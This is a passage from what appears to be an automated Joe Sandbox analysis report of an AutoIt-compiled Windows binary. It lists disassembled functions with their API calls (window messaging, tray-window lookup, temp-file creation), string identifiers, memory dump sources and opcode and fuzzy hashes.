                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: htonsinet_addr
                                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                                        • API String ID: 3832099526-2422070025
                                                                                                                                                        • Opcode ID: 516a0455147a40dc8913819cf4f8c9726749ab54622c6666c508b44e005e8360
                                                                                                                                                        • Instruction ID: a05f2b4aa9741fe0389f8da0aa6ba43f4bcff17663e50ff0867469c9e4852372
                                                                                                                                                        • Opcode Fuzzy Hash: 516a0455147a40dc8913819cf4f8c9726749ab54622c6666c508b44e005e8360
                                                                                                                                                        • Instruction Fuzzy Hash: 6101D235200245ABCB10AFA9CC86FADB3B4EF14720F10852AF5169B2D1DA71F804C766
                                                                                                                                                        Function 00ACC577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00ACC5E5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                                                        • Opcode ID: 8c97d7aac7f13bc9d41fef823c5ed45eb91e613e1d20e4941f9af529a1039a84
                                                                                                                                                        • Instruction ID: 7753fa901284930978b3604af7e0be581d45d68fc80fc0e2de3837aba47ebcec
                                                                                                                                                        • Opcode Fuzzy Hash: 8c97d7aac7f13bc9d41fef823c5ed45eb91e613e1d20e4941f9af529a1039a84
                                                                                                                                                        • Instruction Fuzzy Hash: CE01F771A41518ABCB08EBA8CD52EFE73EAAF42360B540A1DF433E72D1DF3069089750
                                                                                                                                                        Function 00ADC4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fread_nolock_memmove
                                                                                                                                                        • String ID: EA06
                                                                                                                                                        • API String ID: 1988441806-3962188686
                                                                                                                                                        • Opcode ID: 332a796a55ae182d16f658cf36006627fa51b54c3a017a957b93f3fb4b43d6bf
                                                                                                                                                        • Instruction ID: 40017b521f75867c5a020953757f4d45c80378e898f417b4ab6b5904e4843a1d
                                                                                                                                                        • Opcode Fuzzy Hash: 332a796a55ae182d16f658cf36006627fa51b54c3a017a957b93f3fb4b43d6bf
                                                                                                                                                        • Instruction Fuzzy Hash: 9901B572944258BEDB28D7A8C856EFE7BF89B15711F00419BE193D62C2E5B4A708CB60
                                                                                                                                                        Function 00ACC473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00ACC4E1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                                                        • Opcode ID: 3a65a9e946807a1906abbf729a142f36144fbac8c3dba140fefcb14fe26fe11d
                                                                                                                                                        • Instruction ID: 4c0ee760eea42f6de5bcac7b4ce6067a1b3c1c5b413bb0c7b587ff9dede7691a
                                                                                                                                                        • Opcode Fuzzy Hash: 3a65a9e946807a1906abbf729a142f36144fbac8c3dba140fefcb14fe26fe11d
                                                                                                                                                        • Instruction Fuzzy Hash: B101DF71A415086BCB08EBA0CA62FFF73E99B01350F154019F902E72D1DA105E08A7A1
                                                                                                                                                        Function 00ACC4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00ACC562
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                                                        • Opcode ID: cf2b51b82d24a5b3ca09cf004b15e779c59b48ca2eac35874346e2cdca1480b5
                                                                                                                                                        • Instruction ID: 4652ea0dc440e1ff48ad57bd58c9702b1447d62e9b217369f77915d839e7018c
                                                                                                                                                        • Opcode Fuzzy Hash: cf2b51b82d24a5b3ca09cf004b15e779c59b48ca2eac35874346e2cdca1480b5
                                                                                                                                                        • Instruction Fuzzy Hash: 7E01AD71B81508ABCB05EBA4CA52FFF73E99B01751F550019F807E3291EA54AF09A7A1
                                                                                                                                                        Function 00AD804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClassName_wcscmp
                                                                                                                                                        • String ID: #32770
                                                                                                                                                        • API String ID: 2292705959-463685578
                                                                                                                                                        • Opcode ID: 3b431c5598e34b8675e41cb03908f41f899efdaba7eb157cdf533fcda9841d71
                                                                                                                                                        • Instruction ID: a5c73b4b81860c4b59836b360737dd91de30857373349b2f4b4d947d35c79f47
                                                                                                                                                        • Opcode Fuzzy Hash: 3b431c5598e34b8675e41cb03908f41f899efdaba7eb157cdf533fcda9841d71
                                                                                                                                                        • Instruction Fuzzy Hash: 0AE0923360022927D720EAA59C0AFD7FBACEB55BA4F000066A914D3141EA709A4587D4
                                                                                                                                                        Function 00ACB35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00ACB36B
                                                                                                                                                          • Part of subcall function 00AB2011: _doexit.LIBCMT ref: 00AB201B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Message_doexit
                                                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                                                        • API String ID: 1993061046-4017498283
                                                                                                                                                        • Opcode ID: e1111d0d82ca29ddf970e3e2c2bd618ae36db158c696a521de2b824ef8e62f6f
                                                                                                                                                        • Instruction ID: 7b3e191025b33bc7e2f84f335ab501003158cf32c0dccbb445984a34ad101654
                                                                                                                                                        • Opcode Fuzzy Hash: e1111d0d82ca29ddf970e3e2c2bd618ae36db158c696a521de2b824ef8e62f6f
                                                                                                                                                        • Instruction Fuzzy Hash: 4BD0123138435832D21972987D0BFC96ACC4F05B51F514066BF4C965D38AD6958062A9
                                                                                                                                                        Function 00B0BC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00B0BAB8
                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00B0BCAB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                                                                                                        • String ID: WIN_XPe
                                                                                                                                                        • API String ID: 510247158-3257408948
                                                                                                                                                        • Opcode ID: ce972313bb6add65f340dcf18f761d924f6bb76a9d33a2d64fcbaa32b838e06d
                                                                                                                                                        • Instruction ID: 93d7ff69217b7793486a7d7e7636f57d12c56e85d229b9c04be22ce0ac64e8a5
                                                                                                                                                        • Opcode Fuzzy Hash: ce972313bb6add65f340dcf18f761d924f6bb76a9d33a2d64fcbaa32b838e06d
                                                                                                                                                        • Instruction Fuzzy Hash: 83E0A570D04109AFCB15DBA9C985EECBBB8BB08341F54849AE022B30A1CB715A459F25
                                                                                                                                                        Function 00AF8495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AF849F
                                                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AF84B2
                                                                                                                                                          • Part of subcall function 00AD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD83CD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                                        • Opcode ID: 8605920abbd1ec35d2a80a8ce435d0caef9f040d3f65e52d9a9abe3e543da374
                                                                                                                                                        • Instruction ID: 65404003231d7d6fa6ea01e4b06b1a7fc1cbff219f883262784a9ff0f336bcee
                                                                                                                                                        • Opcode Fuzzy Hash: 8605920abbd1ec35d2a80a8ce435d0caef9f040d3f65e52d9a9abe3e543da374
                                                                                                                                                        • Instruction Fuzzy Hash: DCD0A932388320B7E620A330AC0FFC66A84AB14B00F040869720AAA2D0CCA0A8008220
                                                                                                                                                        Function 00AF84C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AF84DF
                                                                                                                                                        • PostMessageW.USER32(00000000), ref: 00AF84E6
                                                                                                                                                          • Part of subcall function 00AD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD83CD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                                        • Opcode ID: 57c16819cf0cdfca349add5459317f49b20159c928ff491425ee281a5b1c2d63
                                                                                                                                                        • Instruction ID: 1a4526b64b191301d2bd01de53d57d1012a38601896e2bbb8c31476950a27f80
                                                                                                                                                        • Opcode Fuzzy Hash: 57c16819cf0cdfca349add5459317f49b20159c928ff491425ee281a5b1c2d63
                                                                                                                                                        • Instruction Fuzzy Hash: F1D022323843207BE721A330AC0FFC77684AB18F00F040869730AAB2D0CCF0B800C220
                                                                                                                                                        Function 00ADD009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00ADD01E
                                                                                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00ADD035
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                                                        • String ID: aut
                                                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                                                        • Opcode ID: 43fd38e24fa875d5b163945039abc788c68bc0d6768f22619241776558a8edaa
                                                                                                                                                        • Instruction ID: 03c7e260acc296d56807d2e309b47b7491b85a67890e8c5ceda3bc494f2eca7d
                                                                                                                                                        • Opcode Fuzzy Hash: 43fd38e24fa875d5b163945039abc788c68bc0d6768f22619241776558a8edaa
                                                                                                                                                        • Instruction Fuzzy Hash: 49D05EB554030EBBDB10ABA0ED0EF99B7ACA704704F5081907625D20D1D7B4D7458BA0